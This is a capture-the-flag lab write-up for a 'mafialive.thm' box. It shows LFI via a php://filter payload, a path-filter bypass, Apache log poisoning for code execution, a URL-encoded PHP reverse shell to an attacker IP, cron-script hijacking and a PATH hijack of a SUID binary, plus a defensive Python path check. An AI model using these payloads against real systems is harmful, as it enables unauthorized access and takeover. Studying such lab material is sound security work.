Target IP: 10.10.159.156
New IP after reverting: 10.10.83.159
A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.
There are two TCP ports open on the target machine: SSH and HTTP. I will start enumeration with the HTTP application on port 80.
Port 80: HTTP
The webpage above is displayed for this web application. I did not find anything useful when viewing the source code of the webpage. The email support@mafialive.thm is interesting. Is mafialive.thm a VHOST? Adding it to the /etc/hosts file confirms that it is.
Now browsing to http://mafialive.thm displays the webpage above.
Doing a directory search against this host with the command gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt shows the entries above. The test.php sounds interesting.
Browsing to this test.php displays the webpage above.
Pressing the button labelled "Here is a button" displays the message above. A new URL parameter called view gets appended as well.
I used ffuf to perform LFI fuzzing, but I did not find anything useful. However, I managed to read the source code of mrrobot.php using PHP filter. I should be able to read the test.php using this PHP filter.
And bingo! Using the payload http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php, I obtained the source code of test.php as base64. Time to decode it.
Decoding the base64 string shows the source code of test.php, as displayed above. There are two conditions set on the view parameter: it is rejected if it contains the string ../.., and it must contain the string /var/www/html/development_testing.
Time to create a payload that bypasses this filtering. Using the payload http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log, I now have access to the access.log file for poisoning. I had to revert this machine because my first attempt at poisoning the file did not work. The new IP for this machine is 10.10.83.159.
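To show why the two substring conditions above are bypassable, and what the check should have looked like, here is an added Python example (not code from the room or from this write-up) that models the recovered conditions beside a resolved-path check; BASE_DIR, the helper names and the sample table are my own, with the sample values constructed from the payloads quoted in this write-up.

```python
import posixpath

# Directory string the recovered test.php check requires in the view parameter
BASE_DIR = "/var/www/html/development_testing"


def weak_check(view: str) -> bool:
    """Model of the two substring conditions recovered from test.php."""
    return "../.." not in view and BASE_DIR in view


def is_safe_include(view: str) -> bool:
    """Resolve the requested path and require it to stay under BASE_DIR."""
    # PHP stream wrappers (php://filter, data://, ...) never name a file under BASE_DIR
    if "://" in view:
        return False
    # Collapse ./ and ../ segments the way the filesystem will, then compare prefixes
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, view))
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")


# Constructed sample inputs: the benign page, the two payloads used in this
# write-up, and a plain traversal that the substring check already catches.
SAMPLES = {
    "benign": "/var/www/html/development_testing/mrrobot.php",
    "filter_wrapper": "php://filter/convert.base64-encode/resource="
                      "/var/www/html/development_testing/test.php",
    "dot_slash_bypass": "/var/www/html/development_testing/.././.././../log/apache2/access.log",
    "plain_traversal": "/var/www/html/development_testing/../../../../etc/passwd",
}


def compare_checks() -> dict:
    """Return {name: (weak_check result, is_safe_include result)} for every sample."""
    return {name: (weak_check(v), is_safe_include(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (weak, safe) in compare_checks().items():
        print(f"{name:18} substring-check={weak!s:5} resolved-path-check={safe}")
```

The substring check accepts both payloads because neither contains ../.. literally and both contain the required prefix, while the resolved-path check rejects them because the wrapper is not a local path and the ./ interleaving still resolves to /var/log/apache2/access.log.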
I poisoned the access.log file with the payload highlighted in the image above.
And success! Sending the commands id;whoami;ls returned the output above. Time to obtain a reverse shell connection.
Since the target machine is running PHP, I sent a PHP reverse shell script to obtain a reverse shell connection. I deployed the payload php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and received a reverse shell connection on my machine on port 8443. Now I have a foothold on the target machine.
Running the command find / -writable -type f 2>/dev/null shows the interesting entry /opt/helloworld.sh, as shown above.
And there is an interesting cron job, /opt/helloworld.sh, that is executed as archangel. I have write privileges over it.
I put my bash reverse shell script inside helloworld.sh. I then received a reverse shell connection as archangel on my machine on port 8444. I successfully moved laterally from www-data to archangel.
The binary backup at /home/archangel/secret has the SUID bit set, and the user archangel can execute it.
Running strings on this binary shows the interesting code above. It copies the contents of home/user/archangel/myfiles/* to /opt/backupfiles. However, the copy binary (cp) is invoked without an absolute path, so I can create a malicious version of it.
I created a malicious version of the copy binary in /tmp that invokes a reverse shell connection to my machine on port 8445. Executing the backup binary then gave me a root reverse shell connection on port 8445. Now I have root access.
The user.txt flag is located in archangel's home directory.
The user2.txt flag after gaining access to the target machine as archangel.
The root.txt flag.